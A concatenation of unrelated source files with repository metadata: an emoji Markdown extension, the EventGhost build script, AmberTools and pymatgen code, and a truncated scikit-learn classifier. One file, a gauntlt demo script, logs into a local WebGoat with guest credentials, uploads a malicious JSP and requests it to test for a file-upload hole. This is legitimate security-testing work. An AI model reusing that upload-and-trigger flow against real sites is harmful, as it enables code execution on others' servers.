# Apply style formatting (requires an element, i.e. span_class or override)
style = self.ext.getConfig('styles').get(emoticon)
if style and element is not None:
element.set('style', style)
return element if element is not None else emoticon
def makeExtension(*args, **kwargs):
return UnimojiExtension(*args, **kwargs)
if __name__ == '__main__':
import doctest; doctest.testmod()
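A minimal usage sketch for the extension above. It assumes Python-Markdown is installed, that this module is importable as `mdx_unimoji` (the repository path suggests so), and that ":heart:" is among the aliases defined earlier in EMOJI:
import markdown
from mdx_unimoji import makeExtension  # assumed import path

# ":heart:" is replaced by the Unicode heart, wrapped in <span class="emoji">
# and given the "color:red" style from STYLES because span_class is enabled.
html = markdown.markdown("I :heart: emoji", extensions=[makeExtension()])
print(html)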
|
Naereen/cuisine
|
plugins/mdx_unimoji/mdx_unimoji.py
|
Python
|
mit
| 47,452
|
[
"Bowtie",
"CASINO",
"CRYSTAL",
"ESPResSo",
"Octopus"
] |
4cc7ae572137d38c54165eb282487b7d5548594a760d9da395de4dc28d1e7170
|
# -*- coding: utf-8 -*-
#
# This file is part of EventGhost.
# Copyright © 2005-2016 EventGhost Project <http://www.eventghost.net/>
#
# EventGhost is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 2 of the License, or (at your option)
# any later version.
#
# EventGhost is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along
# with EventGhost. If not, see <http://www.gnu.org/licenses/>.
"""
This script creates the EventGhost setup installer.
"""
from os.path import dirname, exists, join
# Local imports
import builder
from builder.Utils import CaseInsensitiveList, ListDir
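# Files listed here are added without Inno Setup's "ignoreversion" flag (see
# BuildInstaller below), so an installed copy is only replaced when its
# version information actually changes.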
SKIP_IF_UNCHANGED = CaseInsensitiveList(
r"plugins\Task\TaskHook.dll",
)
class MyBuilder(builder.Builder):
name = "EventGhost"
description = "EventGhost Automation Tool"
companyName = "EventGhost Project"
copyright = u"Copyright © 2005-2016 EventGhost Project"
mainScript = "EventGhost.pyw"
includeModules = [
"CommonMark",
"comtypes",
"Crypto",
"docutils",
"isapi",
"jinja2",
"PIL",
"pkg_resources",
"pythoncom",
"pywin32",
"win32com",
"wx",
]
excludeModules = [
"eg",
"_imagingtk",
"_tkinter",
"cffi", # bundled for no reason
"comtypes.gen",
#"ctypes.macholib", # seems to be for Apple
"curses",
"distutils.command.bdist_packager",
"distutils.mwerkscompiler",
"FixTk",
"FixTk",
"gopherlib",
"idlelib",
"ImageGL",
"ImageQt",
"ImageTk", # py2exe seems to hang if not removed
"ipaddr", # bundled for no reason
"ipaddress", # bundled for no reason
"lib2to3",
"PIL._imagingtk",
"PIL.ImageTk",
"pyasn1", # bundles a broken version if not removed
"pycparser", # bundled for no reason
"pywin",
"simplejson", # bundled for no reason
"tcl",
"test",
"Tix",
"Tkconstants",
"tkinter", # from `future`
"Tkinter",
"turtle", # another Tkinter module
"WalImageFile", # odd syntax error in file
"win32com.axdebug",
"win32com.axscript",
"win32com.demos",
"win32com.gen_py",
"wx.lib.floatcanvas", # needs NumPy
"wx.lib.plot", # needs NumPy
"wx.lib.vtk",
"wx.tools.Editra",
"wx.tools.XRCed",
]
def BuildInstaller(self):
"""
Create and compile the Inno Setup installer script.
"""
from builder.InnoSetup import InnoInstaller
inno = InnoInstaller(self)
for filename, prefix in self.GetSetupFiles():
inno.AddFile(
join(self.sourceDir, filename),
dirname(filename),
ignoreversion=(filename not in SKIP_IF_UNCHANGED),
prefix=prefix
)
if exists(join(self.outputDir, "CHANGELOG.md")):
inno.AddFile(join(self.outputDir, "CHANGELOG.md"))
else:
inno.AddFile(join(self.sourceDir, "CHANGELOG.md"))
inno.AddFile(
join(self.sourceDir, "py%s.exe" % self.pyVersionStr),
destName="py.exe"
)
inno.AddFile(
join(self.sourceDir, "pyw%s.exe" % self.pyVersionStr),
destName="pyw.exe"
)
inno.AddFile(
join(self.tmpDir, "VersionInfo.py"),
destDir="eg\\Classes"
)
inno.ExecuteInnoSetup()
def GetSetupFiles(self):
"""
Return all files needed by the installer.
The code scans for all files in the working copy and adds
them to the list, except if a "noinstall" property is set for the file
or a parent directory of the file.
Plugins with a "noinclude" file are also skipped.
"""
files = set(ListDir(self.sourceDir, [], fullpath=False))
with open(join(self.pyVersionDir, "Root Includes.txt"), "r") as f:
rootIncludes = CaseInsensitiveList(*f.read().strip().split("\n"))
noincludes = [".", "_"]
coreplugins = []
for f in files.copy():
if f.endswith("noinclude"):
noincludes.append(f.replace("noinclude", ""))
elif f.endswith("core-plugin"):
coreplugins.append(f.replace("core-plugin", ""))
files.remove(f)
installFiles = []
for f in files:
if not f.startswith(tuple(noincludes)):
if f.count("\\") == 0 and f not in rootIncludes:
pass
else:
#if f.startswith(tuple(coreplugins)):
installFiles.append([f, "{app}"])
#else:
# # Install to ProgramData\EventGhost\plugins
# installFiles.append([f,
# "{commonappdata}\\%s" % self.appName])
return installFiles
MyBuilder().Start()
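A small illustrative sketch (not part of the build) of the "noinclude" prefix filtering performed in GetSetupFiles above; the file names are made up and the rootIncludes check is omitted:
files = {
    "plugins\\Foo\\noinclude",
    "plugins\\Foo\\Foo.py",
    "plugins\\Bar\\Bar.py",
}
noincludes = [".", "_"]
for f in files.copy():
    if f.endswith("noinclude"):
        # "plugins\Foo\noinclude" turns "plugins\Foo\" into an exclusion
        # prefix that hides every file under that plugin directory.
        noincludes.append(f.replace("noinclude", ""))
        files.remove(f)
print(sorted(f for f in files if not f.startswith(tuple(noincludes))))
# -> ['plugins\\Bar\\Bar.py']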
|
WoLpH/EventGhost
|
_build/Build.py
|
Python
|
gpl-2.0
| 5,391
|
[
"VTK"
] |
31a15048105129e69d38a292bb52670361c4f10f0a06130fe1e168f748e336a3
|
import requests
import os
class attack:
session = requests.Session()
# the login page
url1 = 'http://127.0.0.1:8080/WebGoat/login.mvc'
# where login credentials are posted to
url2 = 'http://127.0.0.1:8080/WebGoat/j_spring_security_check'
# login payload
payload = {'username':'guest','password':'guest'}
# takes us to the login page
first = session.get(url1)
# log in
login = session.post(url2, data=payload)
# where our attack is posted
url3 = 'http://127.0.0.1:8080/WebGoat/attack?Screen=18&menu=1600'
# our attack file
files = {'file': open('vuln-26,maliciousfileattack.jsp', 'rb')}
# post the attack file
r = session.post(url3, files=files)
# where the uploaded file should be stored
url4 = 'http://127.0.0.1:8080/WebGoat/uploads/vuln-26,maliciousfileattack.jsp'
# now we need to visit the page in order to fall victim to the attack file
session.get(url4)
# if the attack worked, a guest.txt file will exist at this location
result = os.path.isfile('/opt/owasp/webgoat/.extract/webapps/WebGoat/mfe_target/guest.txt')
# have gauntlt check which of these strings appears
if result:
print('The site is vulnerable.')
else:
print('The site is secure.')
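A hedged rewrite of the same flow with explicit resource handling and HTTP status checks; the URLs, credentials, and file name are copied from the script above, and this sketch is not part of the original demo:
import requests

with requests.Session() as session:
    session.get('http://127.0.0.1:8080/WebGoat/login.mvc')
    login = session.post(
        'http://127.0.0.1:8080/WebGoat/j_spring_security_check',
        data={'username': 'guest', 'password': 'guest'},
    )
    login.raise_for_status()
    # the context manager guarantees the upload handle is closed
    with open('vuln-26,maliciousfileattack.jsp', 'rb') as payload_file:
        upload = session.post(
            'http://127.0.0.1:8080/WebGoat/attack?Screen=18&menu=1600',
            files={'file': payload_file},
        )
    upload.raise_for_status()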
|
mtesauro/gauntlt-demo
|
examples/webgoat/vuln-26/attack.py
|
Python
|
mit
| 1,189
|
[
"VisIt"
] |
5671274f77308bcf9a6a3ba6a987feafbc67b1489d9e1b31e3600f6b60226da2
|
import sys
sys.path.append('../../')
import amber_run_tests as ar
def test_get_tests_from_test_name():
assert ar.get_tests_from_test_name('test.serial', 'Makefile.amber') == \
['test.serial.MM', 'test.serial.QMMM',
'test.serial.sander.SEBOMD',
'test.serial.emil', 'test.serial.sanderapi']
assert ar.get_bunch_of_individual_tests('test.serial', 'Makefile.amber') == \
[]
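These are plain pytest-style tests; a hypothetical invocation from the test directory would be:
# python -m pytest test_amber_run_tests.py -q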
|
Amber-MD/ambertools-conda-build
|
conda_tools/test/test_amber_run_tests/test_amber_run_tests.py
|
Python
|
mit
| 432
|
[
"Amber"
] |
b757fb5f092fdf6eee3b96547116e43cf7d63b85109f3a5c86d8ecd06f52228c
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
JahnTeller distortion analysis.
"""
import os
import warnings
from typing import Any, Dict, Optional, Tuple, Union
import numpy as np
from pymatgen.analysis.bond_valence import BVAnalyzer
from pymatgen.analysis.local_env import (
LocalStructOrderParams,
get_neighbors_of_site_with_index,
)
from pymatgen.core.periodic_table import Species, get_el_sp
from pymatgen.core.structure import Structure
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
MODULE_DIR = os.path.dirname(os.path.abspath(__file__))
class JahnTellerAnalyzer:
"""
Will attempt to classify if structure *may* be Jahn-Teller active.
The class currently uses a datafile of hard-coded common Jahn-Teller
active ions.
If structure is annotated with magnetic moments, will estimate
if structure may be high-spin or low-spin.
Class aims for more false-positives than false-negatives.
"""
def __init__(self):
"""
Init for JahnTellerAnalyzer.
"""
self.spin_configs = {
"oct": { # key is number of d electrons
0: {"high": {"e_g": 0, "t_2g": 0}, "default": "high"},
1: {"high": {"e_g": 0, "t_2g": 1}, "default": "high"}, # weak J-T
2: {"high": {"e_g": 0, "t_2g": 2}, "default": "high"}, # weak
3: {"high": {"e_g": 0, "t_2g": 3}, "default": "high"}, # no J-T
4: {
"high": {"e_g": 1, "t_2g": 3},
"low": {"e_g": 0, "t_2g": 4},
"default": "high",
}, # strong high, weak low
5: {
"high": {"e_g": 2, "t_2g": 3},
"low": {"e_g": 0, "t_2g": 5},
"default": "low",
}, # no high, weak low
6: {
"high": {"e_g": 2, "t_2g": 4},
"low": {"e_g": 0, "t_2g": 6},
"default": "high",
}, # weak high, no low
7: {
"high": {"e_g": 2, "t_2g": 5},
"low": {"e_g": 1, "t_2g": 6},
"default": "low",
}, # weak high, strong low
8: {"high": {"e_g": 2, "t_2g": 6}, "default": "high"}, # no
9: {"high": {"e_g": 3, "t_2g": 6}, "default": "high"}, # strong
10: {"high": {"e_g": 4, "t_2g": 6}, "default": "high"},
},
"tet": { # no low spin observed experimentally in tetrahedral, all weak J-T
0: {"high": {"e": 0, "t_2": 0}, "default": "high"},
1: {"high": {"e": 1, "t_2": 0}, "default": "high"},
2: {"high": {"e": 2, "t_2": 0}, "default": "high"},
3: {"high": {"e": 2, "t_2": 1}, "default": "high"},
4: {"high": {"e": 2, "t_2": 2}, "default": "high"},
5: {"high": {"e": 2, "t_2": 3}, "default": "high"},
6: {"high": {"e": 3, "t_2": 3}, "default": "high"},
7: {"high": {"e": 4, "t_2": 3}, "default": "high"},
8: {"high": {"e": 4, "t_2": 4}, "default": "high"},
9: {"high": {"e": 4, "t_2": 5}, "default": "high"},
10: {"high": {"e": 4, "t_2": 6}, "default": "high"},
},
}
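# Each motif above maps a d-electron count to the candidate orbital
# occupancies per spin state, plus the spin state assumed by default when
# none can be estimated from magnetic moments.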
def get_analysis_and_structure(
self,
structure: Structure,
calculate_valences: bool = True,
guesstimate_spin: bool = False,
op_threshold: float = 0.1,
) -> Tuple[Dict, Structure]:
"""Obtain an analysis of a given structure and if it may be Jahn-Teller
active or not. This is a heuristic, and may give false positives and
false negatives (false positives are preferred).
Args:
structure: input structure
calculate_valences: whether to attempt to calculate valences or not, structure
should have oxidation states to perform analysis (Default value = True)
guesstimate_spin: whether to guesstimate spin state from magnetic moments
or not, use with caution (Default value = False)
op_threshold: threshold for order parameter above which to consider a site
to match an octahedral or tetrahedral motif; since Jahn-Teller structures
can often be quite distorted, this threshold is smaller than one might
expect (Default value = 0.1)
Returns:
analysis of structure, with key 'strength' which may be 'none', 'strong',
'weak', or 'unknown', and the decorated structure
"""
structure = structure.get_primitive_structure()
if calculate_valences:
bva = BVAnalyzer()
structure = bva.get_oxi_state_decorated_structure(structure)
# no point testing multiple equivalent sites, doesn't make any difference
# to the analysis but makes the returned list of sites cleaner
symmetrized_structure = SpacegroupAnalyzer(structure).get_symmetrized_structure()
# to detect structural motifs of a given site
op = LocalStructOrderParams(["oct", "tet"])
# dict of site index to the Jahn-Teller analysis of that site
jt_sites = []
non_jt_sites = []
for indices in symmetrized_structure.equivalent_indices:
idx = indices[0]
site = symmetrized_structure[idx]
# only interested in sites with oxidation states
if isinstance(site.specie, Species) and site.specie.element.is_transition_metal:
# get motif around site
order_params = op.get_order_parameters(symmetrized_structure, idx)
if order_params[0] > order_params[1] and order_params[0] > op_threshold:
motif = "oct"
motif_order_parameter = order_params[0]
elif order_params[1] > op_threshold:
motif = "tet"
motif_order_parameter = order_params[1]
else:
motif = "unknown"
motif_order_parameter = None
if motif in ["oct", "tet"]:
# guess spin of metal ion
if guesstimate_spin and "magmom" in site.properties:
# estimate if high spin or low spin
magmom = site.properties["magmom"]
spin_state = self._estimate_spin_state(site.specie, motif, magmom)
else:
spin_state = "unknown"
magnitude = self.get_magnitude_of_effect_from_species(site.specie, spin_state, motif)
if magnitude != "none":
ligands = get_neighbors_of_site_with_index(structure, idx, approach="min_dist", delta=0.15)
ligand_bond_lengths = [ligand.distance(structure[idx]) for ligand in ligands]
ligands_species = list({str(ligand.specie) for ligand in ligands})
ligand_bond_length_spread = max(ligand_bond_lengths) - min(ligand_bond_lengths)
def trim(f):
"""
Avoid storing to unreasonable precision, hurts readability.
"""
return float("{:.4f}".format(f))
# to be Jahn-Teller active, all ligands have to be the same
if len(ligands_species) == 1:
jt_sites.append(
{
"strength": magnitude,
"motif": motif,
"motif_order_parameter": trim(motif_order_parameter),
"spin_state": spin_state,
"species": str(site.specie),
"ligand": ligands_species[0],
"ligand_bond_lengths": [trim(length) for length in ligand_bond_lengths],
"ligand_bond_length_spread": trim(ligand_bond_length_spread),
"site_indices": indices,
}
)
# store reasons for not being J-T active
else:
non_jt_sites.append(
{
"site_indices": indices,
"strength": "none",
"reason": "Not Jahn-Teller active for this " "electronic configuration.",
}
)
else:
non_jt_sites.append(
{
"site_indices": indices,
"strength": "none",
"reason": "motif is {}".format(motif),
}
)
# perform aggregation of all sites
if jt_sites:
analysis = {"active": True} # type: Dict[str, Any]
# if any site could exhibit 'strong' Jahn-Teller effect
# then mark whole structure as strong
strong_magnitudes = [site["strength"] == "strong" for site in jt_sites]
if any(strong_magnitudes):
analysis["strength"] = "strong"
else:
analysis["strength"] = "weak"
analysis["sites"] = jt_sites
return analysis, structure
return {"active": False, "sites": non_jt_sites}, structure
def get_analysis(
self,
structure: Structure,
calculate_valences: bool = True,
guesstimate_spin: bool = False,
op_threshold: float = 0.1,
) -> Dict:
"""
Convenience method, uses get_analysis_and_structure method.
Obtain an analysis of a given structure and if it may be Jahn-Teller
active or not. This is a heuristic, and may give false positives and
false negatives (false positives are preferred).
Args:
structure: input structure
calculate_valences: whether to attempt to calculate valences or not, structure
should have oxidation states to perform analysis (Default value = True)
guesstimate_spin: whether to guesstimate spin state from magnetic moments
or not, use with caution (Default value = False)
op_threshold: threshold for order parameter above which to consider a site
to match an octahedral or tetrahedral motif; since Jahn-Teller structures
can often be quite distorted, this threshold is smaller than one might
expect (Default value = 0.1)
Returns:
analysis of structure, with key 'strength' which may be 'none', 'strong',
'weak', or 'unknown'
"""
return self.get_analysis_and_structure(
structure,
calculate_valences=calculate_valences,
guesstimate_spin=guesstimate_spin,
op_threshold=op_threshold,
)[0]
def is_jahn_teller_active(
self,
structure: Structure,
calculate_valences: bool = True,
guesstimate_spin: bool = False,
op_threshold: float = 0.1,
) -> bool:
"""
Convenience method, uses get_analysis_and_structure method.
Check if a given structure and if it may be Jahn-Teller
active or not. This is a heuristic, and may give false positives and
false negatives (false positives are preferred).
Args:
structure: input structure
calculate_valences: whether to attempt to calculate valences or not, structure
should have oxidation states to perform analysis (Default value = True)
guesstimate_spin: whether to guesstimate spin state from magnetic moments
or not, use with caution (Default value = False)
op_threshold: threshold for order parameter above which to consider a site
to match an octahedral or tetrahedral motif; since Jahn-Teller structures
can often be quite distorted, this threshold is smaller than one might
expect (Default value = 0.1)
Returns:
boolean, True if might be Jahn-Teller active, False if not
"""
active = False
try:
analysis = self.get_analysis(
structure,
calculate_valences=calculate_valences,
guesstimate_spin=guesstimate_spin,
op_threshold=op_threshold,
)
active = analysis["active"]
except Exception as e:
warnings.warn("Error analyzing {}: {}".format(structure.composition.reduced_formula, e))
return active
def tag_structure(
self,
structure: Structure,
calculate_valences: bool = True,
guesstimate_spin: bool = False,
op_threshold: float = 0.1,
) -> Structure:
"""
Convenience method, uses get_analysis_and_structure method.
Add a "possible_jt_active" site property on Structure.
Args:
structure: input structure
calculate_valences: whether to attempt to calculate valences or not, structure
should have oxidation states to perform analysis (Default value = True)
guesstimate_spin: whether to guesstimate spin state from magnetic moments
or not, use with caution (Default value = False)
op_threshold: threshold for order parameter above which to consider a site
to match an octahedral or tetrahedral motif; since Jahn-Teller structures
can often be quite distorted, this threshold is smaller than one might
expect (Default value = 0.1)
Returns:
Decorated Structure, will be in primitive setting.
"""
try:
analysis, structure = self.get_analysis_and_structure(
structure,
calculate_valences=calculate_valences,
guesstimate_spin=guesstimate_spin,
op_threshold=op_threshold,
)
jt_sites = [False] * len(structure)
if analysis["active"]:
for site in analysis["sites"]:
for index in site["site_indices"]:
jt_sites[index] = True
structure.add_site_property("possible_jt_active", jt_sites)
return structure
except Exception as e:
warnings.warn("Error analyzing {}: {}".format(structure.composition.reduced_formula, e))
return structure
@staticmethod
def _get_number_of_d_electrons(species: Species) -> float:
"""
Get number of d electrons of a species.
Args:
species: Species object
Returns: Number of d electrons.
"""
# TODO: replace with more generic Hund's rule algorithm?
# taken from get_crystal_field_spin
elec = species.full_electronic_structure
if len(elec) < 4 or elec[-1][1] != "s" or elec[-2][1] != "d":
raise AttributeError("Invalid element {} for crystal field calculation.".format(species.symbol))
nelectrons = int(elec[-1][2] + elec[-2][2] - species.oxi_state)
if nelectrons < 0 or nelectrons > 10:
raise AttributeError("Invalid oxidation state {} for element {}".format(species.oxi_state, species.symbol))
return nelectrons
def get_magnitude_of_effect_from_species(self, species: Union[str, Species], spin_state: str, motif: str) -> str:
"""
Get magnitude of Jahn-Teller effect from provided species, spin state and motif.
Args:
species: e.g. Fe2+
spin_state: "high" or "low"
motif: "oct" or "tet"
Returns: "none", "weak" or "strong
"""
magnitude = "none"
sp = get_el_sp(species)
# has to be Species; we need to know the oxidation state
if isinstance(sp, Species) and sp.element.is_transition_metal:
d_electrons = self._get_number_of_d_electrons(sp)
if motif in self.spin_configs:
if spin_state not in self.spin_configs[motif][d_electrons]:
spin_state = self.spin_configs[motif][d_electrons]["default"]
spin_config = self.spin_configs[motif][d_electrons][spin_state]
magnitude = JahnTellerAnalyzer.get_magnitude_of_effect_from_spin_config(motif, spin_config)
else:
warnings.warn("No data for this species.")
return magnitude
@staticmethod
def get_magnitude_of_effect_from_spin_config(motif: str, spin_config: Dict[str, float]) -> str:
"""
Roughly, the magnitude of Jahn-Teller distortion will be:
* in octahedral environments, strong if e_g orbitals
unevenly occupied but weak if t_2g orbitals unevenly
occupied
* in tetrahedral environments always weaker
Args:
motif: "oct" or "tet"
spin_config: dict of orbital occupancies, keyed 'e_g'/'t_2g' (octahedral)
or 'e'/'t_2' (tetrahedral), with the number of electrons in each state
Returns: "none", "weak" or "strong"
"""
magnitude = "none"
if motif == "oct":
e_g = spin_config["e_g"]
t_2g = spin_config["t_2g"]
if (e_g % 2 != 0) or (t_2g % 3 != 0):
magnitude = "weak"
if e_g % 2 == 1:
magnitude = "strong"
elif motif == "tet":
e = spin_config["e"]
t_2 = spin_config["t_2"]
if (e % 3 != 0) or (t_2 % 2 != 0):
magnitude = "weak"
return magnitude
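# Worked example: high-spin d4 in an octahedron ({"e_g": 1, "t_2g": 3}) has
# an odd e_g count, so this returns "strong", the classic strong Jahn-Teller
# case (e.g. Mn3+).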
@staticmethod
def _estimate_spin_state(species: Union[str, Species], motif: str, known_magmom: float) -> str:
"""Simple heuristic to estimate spin state. If magnetic moment
is sufficiently close to that predicted for a given spin state,
we assign it that state. If we only have data for one spin
state then that's the one we use (e.g. we assume all tetrahedral
complexes are high-spin, since this is typically the case).
Args:
species: str or Species
motif: "oct" or "tet"
known_magmom: magnetic moment in Bohr magnetons
Returns: "undefined" (if only one spin state possible), "low",
"high" or "unknown"
"""
mu_so_high = JahnTellerAnalyzer.mu_so(species, motif=motif, spin_state="high")
mu_so_low = JahnTellerAnalyzer.mu_so(species, motif=motif, spin_state="low")
if mu_so_high == mu_so_low:
return "undefined" # undefined or only one spin state possible
if mu_so_high is None:
return "low"
if mu_so_low is None:
return "high"
diff = mu_so_high - mu_so_low
# WARNING! this heuristic has not been robustly tested or benchmarked
# using 'diff*0.25' as arbitrary measure, if known magmom is
# too far away from expected value, we don't try to classify it
if known_magmom > mu_so_high or abs(mu_so_high - known_magmom) < diff * 0.25:
return "high"
if known_magmom < mu_so_low or abs(mu_so_low - known_magmom) < diff * 0.25:
return "low"
return "unknown"
@staticmethod
def mu_so(species: Union[str, Species], motif: str, spin_state: str) -> Optional[float]:
"""Calculates the spin-only magnetic moment for a
given species. Only supports transition metals.
Args:
species: Species
motif: "oct" or "tet"
spin_state: "high" or "low"
Returns:
Spin-only magnetic moment in Bohr magnetons or None if
species crystal field not defined
"""
try:
sp = get_el_sp(species)
n = sp.get_crystal_field_spin(coordination=motif, spin_config=spin_state)
# calculate the spin-only magnetic moment for this number of unpaired spins
return np.sqrt(n * (n + 2))
except AttributeError:
return None
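A brief usage sketch for the analyzer above; it assumes pymatgen is installed, and the CIF file name is hypothetical:
from pymatgen.core import Structure
from pymatgen.analysis.magnetism.jahnteller import JahnTellerAnalyzer

structure = Structure.from_file("LaMnO3.cif")  # hypothetical input file
jt = JahnTellerAnalyzer()
analysis = jt.get_analysis(structure)  # heuristic; prefers false positives
print(analysis["active"], analysis.get("strength"))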
|
gmatteo/pymatgen
|
pymatgen/analysis/magnetism/jahnteller.py
|
Python
|
mit
| 20,445
|
[
"CRYSTAL",
"pymatgen"
] |
5a76833640aec69d63e1a8eb59ece7281c0eb73facdb7f80f82e4e70c7b20579
|
"""Gaussian processes classification."""
# Authors: Jan Hendrik Metzen <jhm@informatik.uni-bremen.de>
#
# License: BSD 3 clause
from operator import itemgetter
import numpy as np
from scipy.linalg import cholesky, cho_solve, solve
import scipy.optimize
from scipy.special import erf, expit
from ..base import BaseEstimator, ClassifierMixin, clone
from .kernels import RBF, CompoundKernel, ConstantKernel as C
from ..utils.validation import check_is_fitted
from ..utils import check_random_state
from ..utils.optimize import _check_optimize_result
from ..preprocessing import LabelEncoder
from ..multiclass import OneVsRestClassifier, OneVsOneClassifier
# Values required for approximating the logistic sigmoid by
# error functions. coefs are obtained via:
# x = np.array([0, 0.6, 2, 3.5, 4.5, np.inf])
# b = logistic(x)
# A = (erf(np.dot(x, self.lambdas)) + 1) / 2
# coefs = lstsq(A, b)[0]
LAMBDAS = np.array([0.41, 0.4, 0.37, 0.44, 0.39])[:, np.newaxis]
COEFS = np.array(
[-1854.8214151, 3516.89893646, 221.29346712, 128.12323805, -2010.49422654]
)[:, np.newaxis]
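# Reconstruction sketch of the least-squares fit described in the comment
# above (kept commented out so nothing runs at import time; not verified to
# reproduce COEFS to full precision):
#     from numpy.linalg import lstsq
#     x = np.array([0, 0.6, 2, 3.5, 4.5, np.inf])[:, np.newaxis]
#     b = expit(x).ravel()                    # logistic(x)
#     A = (erf(x * LAMBDAS.ravel()) + 1) / 2  # shape (6, 5)
#     coefs = lstsq(A, b, rcond=None)[0]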
class _BinaryGaussianProcessClassifierLaplace(BaseEstimator):
"""Binary Gaussian process classification based on Laplace approximation.
The implementation is based on Algorithm 3.1, 3.2, and 5.1 of
``Gaussian Processes for Machine Learning'' (GPML) by Rasmussen and
Williams.
Internally, the Laplace approximation is used for approximating the
non-Gaussian posterior by a Gaussian.
Currently, the implementation is restricted to using the logistic link
function.
.. versionadded:: 0.18
Parameters
----------
kernel : kernel instance, default=None
The kernel specifying the covariance function of the GP. If None is
passed, the kernel "1.0 * RBF(1.0)" is used as default. Note that
the kernel's hyperparameters are optimized during fitting.
optimizer : 'fmin_l_bfgs_b' or callable, default='fmin_l_bfgs_b'
Can either be one of the internally supported optimizers for optimizing
the kernel's parameters, specified by a string, or an externally
defined optimizer passed as a callable. If a callable is passed, it
must have the signature::
def optimizer(obj_func, initial_theta, bounds):
# * 'obj_func' is the objective function to be maximized, which
# takes the hyperparameters theta as parameter and an
# optional flag eval_gradient, which determines if the
# gradient is returned additionally to the function value
# * 'initial_theta': the initial value for theta, which can be
# used by local optimizers
# * 'bounds': the bounds on the values of theta
....
# Returned are the best found hyperparameters theta and
# the corresponding value of the target function.
return theta_opt, func_min
By default, the 'L-BFGS-B' algorithm from scipy.optimize.minimize
is used. If None is passed, the kernel's parameters are kept fixed.
Available internal optimizers are::
'fmin_l_bfgs_b'
n_restarts_optimizer : int, default=0
The number of restarts of the optimizer for finding the kernel's
parameters which maximize the log-marginal likelihood. The first run
of the optimizer is performed from the kernel's initial parameters,
the remaining ones (if any) from thetas sampled log-uniform randomly
from the space of allowed theta-values. If greater than 0, all bounds
must be finite. Note that n_restarts_optimizer=0 implies that one
run is performed.
max_iter_predict : int, default=100
The maximum number of iterations in Newton's method for approximating
the posterior during predict. Smaller values will reduce computation
time at the cost of worse results.
warm_start : bool, default=False
If warm-starts are enabled, the solution of the last Newton iteration
on the Laplace approximation of the posterior mode is used as
initialization for the next call of _posterior_mode(). This can speed
up convergence when _posterior_mode is called several times on similar
problems as in hyperparameter optimization. See :term:`the Glossary
<warm_start>`.
copy_X_train : bool, default=True
If True, a persistent copy of the training data is stored in the
object. Otherwise, just a reference to the training data is stored,
which might cause predictions to change if the data is modified
externally.
random_state : int, RandomState instance or None, default=None
Determines random number generation used to initialize the centers.
Pass an int for reproducible results across multiple function calls.
See :term:`Glossary <random_state>`.
Attributes
----------
X_train_ : array-like of shape (n_samples, n_features) or list of object
Feature vectors or other representations of training data (also
required for prediction).
y_train_ : array-like of shape (n_samples,)
Target values in training data (also required for prediction)
classes_ : array-like of shape (n_classes,)
Unique class labels.
kernel_ : kernel instance
The kernel used for prediction. The structure of the kernel is the
same as the one passed as parameter but with optimized hyperparameters
L_ : array-like of shape (n_samples, n_samples)
Lower-triangular Cholesky decomposition of the kernel in X_train_
pi_ : array-like of shape (n_samples,)
The probabilities of the positive class for the training points
X_train_
W_sr_ : array-like of shape (n_samples,)
Square root of W, the Hessian of log-likelihood of the latent function
values for the observed labels. Since W is diagonal, only the diagonal
of sqrt(W) is stored.
log_marginal_likelihood_value_ : float
The log-marginal-likelihood of ``self.kernel_.theta``
"""
def __init__(
self,
kernel=None,
*,
optimizer="fmin_l_bfgs_b",
n_restarts_optimizer=0,
max_iter_predict=100,
warm_start=False,
copy_X_train=True,
random_state=None,
):
self.kernel = kernel
self.optimizer = optimizer
self.n_restarts_optimizer = n_restarts_optimizer
self.max_iter_predict = max_iter_predict
self.warm_start = warm_start
self.copy_X_train = copy_X_train
self.random_state = random_state
def fit(self, X, y):
"""Fit Gaussian process classification model.
Parameters
----------
X : array-like of shape (n_samples, n_features) or list of object
Feature vectors or other representations of training data.
y : array-like of shape (n_samples,)
Target values, must be binary.
Returns
-------
self : returns an instance of self.
"""
if self.kernel is None: # Use an RBF kernel as default
self.kernel_ = C(1.0, constant_value_bounds="fixed") * RBF(
1.0, length_scale_bounds="fixed"
)
else:
self.kernel_ = clone(self.kernel)
self.rng = check_random_state(self.random_state)
self.X_train_ = np.copy(X) if self.copy_X_train else X
# Encode class labels and check that it is a binary classification
# problem
label_encoder = LabelEncoder()
self.y_train_ = label_encoder.fit_transform(y)
self.classes_ = label_encoder.classes_
if self.classes_.size > 2:
raise ValueError(
"%s supports only binary classification. y contains classes %s"
% (self.__class__.__name__, self.classes_)
)
elif self.classes_.size == 1:
raise ValueError(
"{0:s} requires 2 classes; got {1:d} class".format(
self.__class__.__name__, self.classes_.size
)
)
if self.optimizer is not None and self.kernel_.n_dims > 0:
# Choose hyperparameters based on maximizing the log-marginal
# likelihood (potentially starting from several initial values)
def obj_func(theta, eval_gradient=True):
if eval_gradient:
lml, grad = self.log_marginal_likelihood(
theta, eval_gradient=True, clone_kernel=False
)
return -lml, -grad
else:
return -self.log_marginal_likelihood(theta, clone_kernel=False)
# First optimize starting from theta specified in kernel
optima = [
self._constrained_optimization(
obj_func, self.kernel_.theta, self.kernel_.bounds
)
]
# Additional runs are performed from log-uniform chosen initial
# theta
if self.n_restarts_optimizer > 0:
if not np.isfinite(self.kernel_.bounds).all():
raise ValueError(
"Multiple optimizer restarts (n_restarts_optimizer>0) "
"requires that all bounds are finite."
)
bounds = self.kernel_.bounds
for iteration in range(self.n_restarts_optimizer):
theta_initial = np.exp(self.rng.uniform(bounds[:, 0], bounds[:, 1]))
optima.append(
self._constrained_optimization(obj_func, theta_initial, bounds)
)
# Select result from run with minimal (negative) log-marginal
# likelihood
lml_values = list(map(itemgetter(1), optima))
self.kernel_.theta = optima[np.argmin(lml_values)][0]
self.kernel_._check_bounds_params()
self.log_marginal_likelihood_value_ = -np.min(lml_values)
else:
self.log_marginal_likelihood_value_ = self.log_marginal_likelihood(
self.kernel_.theta
)
# Precompute quantities required for predictions which are independent
# of actual query points
K = self.kernel_(self.X_train_)
_, (self.pi_, self.W_sr_, self.L_, _, _) = self._posterior_mode(
K, return_temporaries=True
)
return self
def predict(self, X):
"""Perform classification on an array of test vectors X.
Parameters
----------
X : array-like of shape (n_samples, n_features) or list of object
Query points where the GP is evaluated for classification.
Returns
-------
